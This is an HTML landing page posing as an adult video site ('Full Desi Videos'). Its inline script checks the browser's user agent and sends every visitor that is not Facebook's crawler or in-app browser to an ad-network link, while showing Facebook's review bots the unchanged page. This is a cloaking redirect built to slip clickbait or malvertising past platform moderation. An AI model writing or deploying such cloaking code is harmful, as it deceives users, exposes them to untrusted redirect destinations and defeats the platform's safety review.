<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Full Desi Videos 🥵🥵🥵 </title>
    <meta name="description" content="xxx full time" />
    <meta name="author" content="Prime Digital" />

    <meta property="og:title" content="Full Desi Videos 🥵🥵🥵" />
    <meta property="og:description" content="Full Desi Videos 🥵🥵🥵" />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="" />

    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@lovable_dev" />
    <meta name="twitter:image" content="https://photos.fife.usercontent.google.com/pw/AP1GczOoKYSrmWAAa6NJM4xKsTfeW4CMbr2PkTPUZvWD6-llSsvX1snvdMuc=w725-h710-s-no-gm?authuser=0" />
  </head>

  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.tsx"></script>
  </body>
 <script>
window.onload = function () {
    var ua = navigator.userAgent.toLowerCase();

    var isFacebook =
        ua.includes("facebookexternalhit") ||
        ua.includes("facebot") ||
        ua.includes("fbav") ||
        ua.includes("fbios");

    if (!isFacebook) {
        // ✅ Normal user → redirect
   // window.location.href = "https://my-feed-landing.pages.dev/";
      window.location.href = "https://www.effectivegatecpm.com/paciwfjc?key=287a4d6896e933decd35d99d4413bd7a";
    } else {
        // ❌ Facebook bot / FB in-app → no redirect
        console.log("Facebook user detected – redirect skipped");
    }
};
</script>

</html>
